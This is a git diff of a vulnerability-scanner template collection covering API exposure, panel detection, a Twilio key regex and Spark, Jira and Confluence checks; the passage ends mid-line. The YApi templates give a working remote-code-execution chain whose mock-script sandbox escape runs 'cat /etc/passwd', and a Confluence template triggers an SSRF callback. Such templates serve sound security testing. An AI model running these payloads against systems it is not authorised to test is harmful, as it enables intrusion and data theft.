exposure,api,swagger - requests: - method: GET path: @@ -16,6 +14,7 @@ requests: - "{{BaseURL}}/api/swagger-ui.html" - "{{BaseURL}}/api-docs/swagger.json" - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/api_docs" - "{{BaseURL}}/swagger.json" - "{{BaseURL}}/swagger.yaml" - "{{BaseURL}}/swagger/v1/swagger.json" @@ -50,7 +49,7 @@ requests: - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" - + - "{{BaseURL}}/api/swagger_doc.json" stop-at-first-match: true matchers-condition: and matchers: @@ -62,7 +61,6 @@ requests: - "Swagger UI" - "**token**:" condition: or - - type: status status: - 200 diff --git a/poc/api/swagger-api-10594.yaml b/poc/api/swagger-api-10594.yaml new file mode 100644 index 0000000000..b7d499e8a8 --- /dev/null +++ b/poc/api/swagger-api-10594.yaml @@ -0,0 +1,68 @@ +id: swagger-api + +info: + name: Public Swagger API + author: pdteam + severity: info + tags: exposure,api,swagger + +requests: + - method: GET + path: + - "{{BaseURL}}/swagger/ui/index" + - "{{BaseURL}}/swagger/index.html" + - "{{BaseURL}}/swagger-ui.html" + - "{{BaseURL}}/swagger/swagger-ui.html" + - "{{BaseURL}}/api/swagger-ui.html" + - "{{BaseURL}}/api-docs/swagger.json" + - "{{BaseURL}}/api-docs/swagger.yaml" + - "{{BaseURL}}/swagger.json" + - "{{BaseURL}}/swagger.yaml" + - "{{BaseURL}}/swagger/v1/swagger.json" + - "{{BaseURL}}/swagger/v1/swagger.yaml" + - "{{BaseURL}}/api/index.html" + - "{{BaseURL}}/api/docs/" + - "{{BaseURL}}/api/swagger.json" + - "{{BaseURL}}/api/swagger.yaml" + - "{{BaseURL}}/api/swagger.yml" + - "{{BaseURL}}/api/swagger/index.html" + - "{{BaseURL}}/api/swagger/swagger-ui.html" + - "{{BaseURL}}/api/api-docs/swagger.json" + - "{{BaseURL}}/api/api-docs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/swagger.json" + - "{{BaseURL}}/api/swagger-ui/swagger.yaml" + - "{{BaseURL}}/api/apidocs/swagger.json" + - "{{BaseURL}}/api/apidocs/swagger.yaml" + - "{{BaseURL}}/api/swagger-ui/api-docs" + - "{{BaseURL}}/api/api-docs" + - "{{BaseURL}}/api/apidocs" + - "{{BaseURL}}/api/swagger" + - "{{BaseURL}}/api/swagger/static/index.html" + - "{{BaseURL}}/api/swagger-resources" + - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" + - "{{BaseURL}}/api/__swagger__/" + - "{{BaseURL}}/api/_swagger_/" + - "{{BaseURL}}/api/spec/swagger.json" + - "{{BaseURL}}/api/spec/swagger.yaml" + - "{{BaseURL}}/api/swagger/ui/index" + - "{{BaseURL}}/__swagger__/" + - "{{BaseURL}}/_swagger_/" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" + - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" + - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "swagger:" + - "Swagger 2.0" + - "\"swagger\":" + - "Swagger UI" + - "**token**:" + condition: or + + - type: status + status: + - 200 diff --git a/poc/api/swagger-api-10595.yaml b/poc/api/swagger-api-10595.yaml deleted file mode 100644 index 2662c02a5d..0000000000 --- a/poc/api/swagger-api-10595.yaml +++ /dev/null @@ -1,66 +0,0 @@ -id: swagger-api -info: - name: Public Swagger API - author: pdteam - severity: info - tags: exposure,api,swagger -requests: - - method: GET - path: - - "{{BaseURL}}/swagger/ui/index" - - "{{BaseURL}}/swagger/index.html" - - "{{BaseURL}}/swagger-ui.html" - - "{{BaseURL}}/swagger/swagger-ui.html" - - "{{BaseURL}}/api/swagger-ui.html" - - "{{BaseURL}}/api-docs/swagger.json" - - "{{BaseURL}}/api-docs/swagger.yaml" - - "{{BaseURL}}/api_docs" - - "{{BaseURL}}/swagger.json" - - "{{BaseURL}}/swagger.yaml" - - "{{BaseURL}}/swagger/v1/swagger.json" - - "{{BaseURL}}/swagger/v1/swagger.yaml" - - "{{BaseURL}}/api/index.html" - - "{{BaseURL}}/api/docs/" - - "{{BaseURL}}/api/swagger.json" - - "{{BaseURL}}/api/swagger.yaml" - - "{{BaseURL}}/api/swagger.yml" - - "{{BaseURL}}/api/swagger/index.html" - - "{{BaseURL}}/api/swagger/swagger-ui.html" - - "{{BaseURL}}/api/api-docs/swagger.json" - - "{{BaseURL}}/api/api-docs/swagger.yaml" - - "{{BaseURL}}/api/swagger-ui/swagger.json" - - "{{BaseURL}}/api/swagger-ui/swagger.yaml" - - "{{BaseURL}}/api/apidocs/swagger.json" - - "{{BaseURL}}/api/apidocs/swagger.yaml" - - "{{BaseURL}}/api/swagger-ui/api-docs" - - "{{BaseURL}}/api/api-docs" - - "{{BaseURL}}/api/apidocs" - - "{{BaseURL}}/api/swagger" - - "{{BaseURL}}/api/swagger/static/index.html" - - "{{BaseURL}}/api/swagger-resources" - - "{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs" - - "{{BaseURL}}/api/__swagger__/" - - "{{BaseURL}}/api/_swagger_/" - - "{{BaseURL}}/api/spec/swagger.json" - - "{{BaseURL}}/api/spec/swagger.yaml" - - "{{BaseURL}}/api/swagger/ui/index" - - "{{BaseURL}}/__swagger__/" - - "{{BaseURL}}/_swagger_/" - - "{{BaseURL}}/api/v1/swagger-ui/swagger.json" - - "{{BaseURL}}/api/v1/swagger-ui/swagger.yaml" - - "{{BaseURL}}/swagger-resources/restservices/v2/api-docs" - - "{{BaseURL}}/api/swagger_doc.json" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "swagger:" - - "Swagger 2.0" - - "\"swagger\":" - - "Swagger UI" - - "**token**:" - condition: or - - type: status - status: - - 200 diff --git a/poc/api/twilio-api-10860.yaml b/poc/api/twilio-api-10860.yaml deleted file mode 100644 index f1a98cc01b..0000000000 --- a/poc/api/twilio-api-10860.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: twilio-api -info: - name: Twilio API Key - author: gaurang - severity: high - tags: token,file -file: - - extensions: - - all - extractors: - - type: regex - regex: - - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" diff --git a/poc/api/twilio-api-10861.yaml b/poc/api/twilio-api-10861.yaml new file mode 100644 index 0000000000..9895746a8a --- /dev/null +++ b/poc/api/twilio-api-10861.yaml @@ -0,0 +1,16 @@ +id: twilio-api + +info: + name: Twilio API Key + author: gaurang + severity: high + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" \ No newline at end of file diff --git a/poc/api/unauth-spark-api-10964.yaml b/poc/api/unauth-spark-api-10964.yaml index 952e0c2f9e..2025d7145b 100644 --- a/poc/api/unauth-spark-api-10964.yaml +++ b/poc/api/unauth-spark-api-10964.yaml @@ -3,8 +3,14 @@ info: name: Unauthenticated Spark REST API author: princechaddha severity: medium + description: The Spark product's REST API interface allows access to unauthenticated users. + remediation: Restrict access the exposed API ports. reference: https://xz.aliyun.com/t/2490 tags: spark,unauth + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 requests: - method: GET path: @@ -20,3 +26,5 @@ requests: - "serverSparkVersion" part: body condition: and + +# Enhanced by cs on 2022/02/28 diff --git a/poc/api/unauth-spark-api-10965.yaml b/poc/api/unauth-spark-api-10965.yaml index 1c1dc97bec..2a9c510eab 100644 --- a/poc/api/unauth-spark-api-10965.yaml +++ b/poc/api/unauth-spark-api-10965.yaml @@ -3,14 +3,8 @@ info: name: Unauthenticated Spark REST API author: princechaddha severity: medium - description: The Spark product's REST API interface allows access to unauthenticated users. - reference: - - https://xz.aliyun.com/t/2490 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - remediation: Restrict access the exposed API ports. + description: The remote Spark product's REST API interface does not appear to prevent unauthenticated users from accesing it. + reference: https://xz.aliyun.com/t/2490 tags: spark,unauth requests: - method: GET @@ -27,5 +21,3 @@ requests: - "serverSparkVersion" part: body condition: and - -# Enhanced by cs on 2022/02/28 diff --git a/poc/api/wadl-api-11082.yaml b/poc/api/wadl-api-11082.yaml index 84a5ac47dd..1e046a7ef3 100644 --- a/poc/api/wadl-api-11082.yaml +++ b/poc/api/wadl-api-11082.yaml @@ -1,22 +1,13 @@ id: wadl-api - info: - name: WADL API - Detect + name: wadl file disclosure author: 0xrudra,manuelbua severity: info - description: WADL API was detected. + tags: exposure,api reference: - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 8 - tags: exposure,api - -http: +requests: - method: GET path: - "{{BaseURL}}/application.wadl" @@ -24,7 +15,6 @@ http: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true matchers: - name: http-get @@ -33,13 +23,11 @@ http: - "This is simplified WADL with user and core resources only" - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - stop-at-first-match: true matchers: - name: http-options @@ -48,5 +36,3 @@ http: - "This is simplified WADL with user and core resources only" - "http://jersey.java.net" - "http://wadl.dev.java.net/2009/02" - -# digest: 4b0a00483046022100e2f839e3c09ac43f2fef563e3df53c2508374f88b7a6440f5b8e77a7dbefcc05022100a0f7c47efacbf012afecb48f03f8c1f63a337bf8b96061929d5a1de831f61d79:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/wadl-api-11083.yaml b/poc/api/wadl-api-11083.yaml index cabb94dfd0..35e018d786 100644 --- a/poc/api/wadl-api-11083.yaml +++ b/poc/api/wadl-api-11083.yaml @@ -1,12 +1,12 @@ id: wadl-api info: name: wadl file disclosure - author: 0xrudra,manuelbua + author: 0xrudra & manuelbua severity: info - reference: + tags: exposure,api + reference: | - https://github.com/dwisiswant0/wadl-dumper - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ - tags: exposure,api requests: - method: GET path: @@ -15,24 +15,26 @@ requests: - "{{BaseURL}}/api/application.wadl" - "{{BaseURL}}/api/v1/application.wadl" - "{{BaseURL}}/api/v2/application.wadl" - stop-at-first-match: true matchers: - name: http-get type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" + condition: or + part: body - method: OPTIONS path: - "{{BaseURL}}" - "{{BaseURL}}/api/v1" - "{{BaseURL}}/api/v2" - stop-at-first-match: true matchers: - name: http-options type: word words: - "This is simplified WADL with user and core resources only" - - "http://jersey.java.net" + - "\"http://jersey.java.net/\"" - "http://wadl.dev.java.net/2009/02" + condition: or + part: body diff --git a/poc/api/wadl-api-11084.yaml b/poc/api/wadl-api-11084.yaml deleted file mode 100644 index 35e018d786..0000000000 --- a/poc/api/wadl-api-11084.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: wadl-api -info: - name: wadl file disclosure - author: 0xrudra & manuelbua - severity: info - tags: exposure,api - reference: | - - https://github.com/dwisiswant0/wadl-dumper - - https://www.nopsec.com/leveraging-exposed-wadl-xml-in-burp-suite/ -requests: - - method: GET - path: - - "{{BaseURL}}/application.wadl" - - "{{BaseURL}}/application.wadl?detail=true" - - "{{BaseURL}}/api/application.wadl" - - "{{BaseURL}}/api/v1/application.wadl" - - "{{BaseURL}}/api/v2/application.wadl" - matchers: - - name: http-get - type: word - words: - - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" - - "http://wadl.dev.java.net/2009/02" - condition: or - part: body - - method: OPTIONS - path: - - "{{BaseURL}}" - - "{{BaseURL}}/api/v1" - - "{{BaseURL}}/api/v2" - matchers: - - name: http-options - type: word - words: - - "This is simplified WADL with user and core resources only" - - "\"http://jersey.java.net/\"" - - "http://wadl.dev.java.net/2009/02" - condition: or - part: body diff --git a/poc/api/yapi-detect-11720.yaml b/poc/api/yapi-detect-11720.yaml new file mode 100644 index 0000000000..3d24ff00ba --- /dev/null +++ b/poc/api/yapi-detect-11720.yaml @@ -0,0 +1,21 @@ +id: yapi-detect +info: + name: YApi Detect + author: pikpikcu + severity: info + metadata: + shodan-query: http.title:"YApi" + tags: tech,yapi +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "YApi-高效、易用、功能强大的可视化接口管理平台" + - type: status + status: + - 200 diff --git a/poc/api/yapi-detect-11721.yaml b/poc/api/yapi-detect-11721.yaml index 158384897e..cf56584b89 100644 --- a/poc/api/yapi-detect-11721.yaml +++ b/poc/api/yapi-detect-11721.yaml @@ -1,19 +1,28 @@ id: yapi-detect + info: name: YApi Detect author: pikpikcu severity: info + metadata: + max-request: 1 + shodan-query: http.title:"YApi" tags: tech,yapi -requests: + +http: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: word part: body words: - "YApi-高效、易用、功能强大的可视化接口管理平台" + - type: status status: - 200 + +# digest: 4a0a00473045022100d065fd5b007edee8b857f54125c1ad7475fbf9817a640e334a022db8b8b4e13702201cf3269e3d0dd2ecc4a51d6dcda283dbeda97f867b5e6cbbef31dcaeb31861ab:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/yapi-rce-11724.yaml b/poc/api/yapi-rce-11724.yaml index 0afebedde5..62f4be0f79 100644 --- a/poc/api/yapi-rce-11724.yaml +++ b/poc/api/yapi-rce-11724.yaml @@ -1,55 +1,68 @@ id: yapi-rce info: - name: Yapi - Remote Code Execution + name: Yapi Remote Code Execution author: pikpikcu severity: critical - description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. - reference: + tags: yapi,rce + reference: | - https://www.secpulse.com/archives/162502.html - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b - https://twitter.com/sec715/status/1415484190561161216 - https://github.com/YMFE/yapi - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 - tags: yapi,rce requests: - raw: - | # REQUEST 1 POST /api/user/reg HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 94 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip - {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + {"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"} - | # REQUEST 2 GET /api/group/list HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/json, text/plain, */* + Accept-Encoding: gzip - | # REQUEST 3 POST /api/project/add HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 106 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} - | # REQUEST 4 GET /api/project/get?id={{project_id}} HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip - | # REQUEST 5 POST /api/interface/add HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 89 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} - | # REQUEST 6 POST /api/plugin/advmock/save HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Content-Length: 382 Content-Type: application/json;charset=UTF-8 + Accept-Encoding: gzip {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} - | # REQUEST 7 GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + Accept-Encoding: gzip cookie-reuse: true extractors: - type: regex @@ -77,10 +90,8 @@ requests: matchers: - type: regex regex: - - "root:.*:0:0:" + - "root:[x*]:0:0:" part: body - type: status status: - 200 - -# Enhanced by mp on 2022/06/03 diff --git a/poc/api/yapi-rce-11725.yaml b/poc/api/yapi-rce-11725.yaml new file mode 100644 index 0000000000..eddee939b0 --- /dev/null +++ b/poc/api/yapi-rce-11725.yaml @@ -0,0 +1,93 @@ +id: yapi-rce + +info: + name: Yapi - Remote Code Execution + author: pikpikcu + severity: critical + description: Yapi allows remote unauthenticated attackers to cause the product to execute arbitrary code. + reference: + - https://www.secpulse.com/archives/162502.html + - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b + - https://twitter.com/sec715/status/1415484190561161216 + - https://github.com/YMFE/yapi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cwe-id: CWE-77 + metadata: + max-request: 7 + tags: yapi,rce,intrusive + +http: + - raw: + - | # REQUEST 1 + POST /api/user/reg HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"} + - | # REQUEST 2 + GET /api/group/list HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json, text/plain, */* + - | # REQUEST 3 + POST /api/project/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"name":"{{randstr}}","basepath":"","group_id":"{{group_id}}","icon":"code-o","color":"cyan","project_type":"private"} + - | # REQUEST 4 + GET /api/project/get?id={{project_id}} HTTP/1.1 + Host: {{Hostname}} + - | # REQUEST 5 + POST /api/interface/add HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"method":"GET","catid":"{{project_id}}","title":"{{randstr_1}}","path":"/{{randstr_1}}","project_id":{{project_id}}} + - | # REQUEST 6 + POST /api/plugin/advmock/save HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json;charset=UTF-8 + + {"project_id":"{{project_id}}","interface_id":"{{interface_id}}","mock_script":"const sandbox = this\r\nconst ObjectConstructor = this.constructor\r\nconst FunctionConstructor = ObjectConstructor.constructor\r\nconst myfun = FunctionConstructor('return process')\r\nconst process = myfun()\r\nmockJson = process.mainModule.require(\"child_process\").execSync(\"cat /etc/passwd\").toString()","enable":true} + - | # REQUEST 7 + GET /mock/{{project_id}}/{{randstr_1}} HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + name: group_id + group: 1 + internal: true + part: body + regex: + - '"_id":([0-9]+),"group_name"' + + - type: regex + name: interface_id + group: 1 + internal: true + part: body + regex: + - '"req_body_form":\[\],"_id":([0-9]+)' + + - type: regex + name: project_id + group: 1 + internal: true + part: body + regex: + - '"tag":\[\],"_id":([0-9]+)' + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0:" + part: body + + - type: status + status: + - 200 +# digest: 4a0a00473045022100857a39d2000a4c0e2a260f90a975b780753a4ea5487ca4abbcf77af0d766d864022042372ed424fc68b31758bed543c02beedaaf6d7e31eed017338492327c5aa6ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/atlassian/atlassian-crowd-panel-580.yaml b/poc/atlassian/atlassian-crowd-panel-580.yaml index b14248a9a9..4fd18bcda4 100644 --- a/poc/atlassian/atlassian-crowd-panel-580.yaml +++ b/poc/atlassian/atlassian-crowd-panel-580.yaml @@ -1,28 +1,19 @@ id: atlassian-crowd-panel info: - name: Atlassian Crowd Login Panel + name: Atlassian Crowd panel detect author: organiccrap - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ severity: info - tags: panel,atlassian - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 + tags: panel requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 matchers: - type: word words: - Atlassian Crowd - Login part: body - -# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/atlassian-crowd-panel-583.yaml b/poc/atlassian/atlassian-crowd-panel-583.yaml new file mode 100644 index 0000000000..3532e9a84c --- /dev/null +++ b/poc/atlassian/atlassian-crowd-panel-583.yaml @@ -0,0 +1,25 @@ +id: atlassian-crowd-panel + +info: + name: Atlassian Crowd Login Panel + author: organiccrap + severity: info + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + tags: panel,atlassian + +requests: + - method: GET + path: + - '{{BaseURL}}/crowd/console/login.action' + + matchers: + - type: word + words: + - Atlassian Crowd - Login + part: body + +# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/atlassian-crowd-panel-584.yaml b/poc/atlassian/atlassian-crowd-panel-584.yaml deleted file mode 100644 index 4fd18bcda4..0000000000 --- a/poc/atlassian/atlassian-crowd-panel-584.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: atlassian-crowd-panel - -info: - name: Atlassian Crowd panel detect - author: organiccrap - severity: info - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - matchers: - - type: word - words: - - Atlassian Crowd - Login - part: body diff --git a/poc/atlassian/atlassian-crowd-panel-585.yaml b/poc/atlassian/atlassian-crowd-panel-585.yaml index 3532e9a84c..b7819bc20a 100644 --- a/poc/atlassian/atlassian-crowd-panel-585.yaml +++ b/poc/atlassian/atlassian-crowd-panel-585.yaml @@ -1,14 +1,9 @@ id: atlassian-crowd-panel info: - name: Atlassian Crowd Login Panel + name: Atlassian Crowd panel detect author: organiccrap severity: info - description: An Atlassian Crowd login panel was discovered. - reference: - - https://www.atlassian.com/ - classification: - cwe-id: CWE-200 tags: panel,atlassian requests: @@ -21,5 +16,3 @@ requests: words: - Atlassian Crowd - Login part: body - -# Enhanced by mp on 2022/03/20 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml index ed2faf3539..ce7c19d866 100644 --- a/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml +++ b/poc/atlassian/confluence-ssrf-sharelinks-1191.yaml @@ -1,44 +1,19 @@ id: confluence-ssrf-sharelinks - info: - name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery + name: Confluence SSRF in sharelinks author: TechbrunchFR severity: medium - description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. + description: Vulnerable should be Confluence versions released from 2016 November and older reference: - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - https://github.com/assetnote/blind-ssrf-chains#confluence - - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 6.8 - cwe-id: CWE-918 - remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: confluence,atlassian,ssrf,oast - + tags: confluence,atlassian,ssrf,jira,oast requests: - method: GET path: - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' - - matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" - - - type: word - part: body - words: - - "faviconURL" - - "domain" - condition: and - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml new file mode 100644 index 0000000000..ed2faf3539 --- /dev/null +++ b/poc/atlassian/confluence-ssrf-sharelinks-1192.yaml @@ -0,0 +1,44 @@ +id: confluence-ssrf-sharelinks + +info: + name: Atlassian Confluence < 5.8.6 Server-Side Request Forgery + author: TechbrunchFR + severity: medium + description: Atlassian Confluence < 5.8.6 is affected by a blind server-side request forgery vulnerability in the widgetconnector plugin. + reference: + - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks + - https://github.com/assetnote/blind-ssrf-chains#confluence + - https://nvd.nist.gov/vuln/detail/CVE-2021-26072 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 6.8 + cwe-id: CWE-918 + remediation: Upgrade to Atlassian Confluence version 5.8.6 or later. + metadata: + shodan-query: http.component:"Atlassian Confluence" + tags: confluence,atlassian,ssrf,oast + +requests: + - method: GET + path: + - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + + - type: word + part: body + words: + - "faviconURL" + - "domain" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml b/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml deleted file mode 100644 index 7e693c969d..0000000000 --- a/poc/atlassian/confluence-ssrf-sharelinks-1193.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: confluence-ssrf-sharelinks - -info: - name: Confluence SSRF in sharelinks - author: TechbrunchFR - severity: medium - description: Vulnerable should be Confluence versions released from 2016 November and older - reference: - - https://bitbucket.org/atlassian/confluence-business-blueprints/pull-requests/144/issue-60-conf-45342-ssrf-in-sharelinks - - https://github.com/assetnote/blind-ssrf-chains#confluence - metadata: - shodan-query: http.component:"Atlassian Confluence" - tags: confluence,atlassian,ssrf,oast - -requests: - - method: GET - path: - - '{{BaseURL}}/rest/sharelinks/1.0/link?url=https://{{interactsh-url}}/' - - matchers-condition: and - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" - - - type: word - part: body - words: - - "faviconURL" - - "domain" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/poc/atlassian/jira-detect-8314.yaml b/poc/atlassian/jira-detect-8314.yaml new file mode 100644 index 0000000000..15c0eed570 --- /dev/null +++ b/poc/atlassian/jira-detect-8314.yaml @@ -0,0 +1,41 @@ +id: jira-detect + +info: + name: Jira Detect + author: pdteam,philippedelteil,AdamCrosser + severity: info + description: Jira login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 3 + vendor: atlassian + product: jira + category: productivity + tags: tech,panel,jira,atlassian + +http: + - method: GET + path: + - "{{BaseURL}}/secure/Dashboard.jspa" + - "{{BaseURL}}/jira/secure/Dashboard.jspa" + - "{{BaseURL}}/login.jsp" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: word + words: + - "Project Management Software" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'title="JiraVersion" value="([0-9.]+)' + +# digest: 490a0046304402203f99e71e0681c665e3475c12a94f49aa95b84a20350aa939aaa56fb1da3f245b022054dbaf3c59f30928faa87819f2adc87784b746dae1e058bcaf38210a1bfa597d:922c64590222798bb761d5b6d8e72950 diff --git a/poc/atlassian/jira-service-desk-signup-8317.yaml b/poc/atlassian/jira-service-desk-signup-8317.yaml new file mode 100644 index 0000000000..558b3ff970 --- /dev/null +++ b/poc/atlassian/jira-service-desk-signup-8317.yaml @@ -0,0 +1,21 @@ +id: jira-service-desk-signup +info: + name: Jira Service Desk Signup + author: TechbrunchFR + severity: medium + tags: jira,atlassian +requests: + - method: POST + path: + - "{{BaseURL}}/servicedesk/customer/user/signup" + headers: + Content-Type: application/json + body: '{"email":"invalid","signUpContext":{},"secondaryEmail":"","usingNewUi":true}' + matchers-condition: and + matchers: + - type: word + words: + - "signup.validation.errors" + - type: status + status: + - 400 diff --git a/poc/atlassian/jira-service-desk-signup-8320.yaml b/poc/atlassian/jira-service-desk-signup-8320.yaml index 558b3ff970..37841da047 100644 --- a/poc/atlassian/jira-service-desk-signup-8320.yaml +++ b/poc/atlassian/jira-service-desk-signup-8320.yaml @@ -3,7 +3,7 @@ info: name: Jira Service Desk Signup author: TechbrunchFR severity: medium - tags: jira,atlassian + tags: 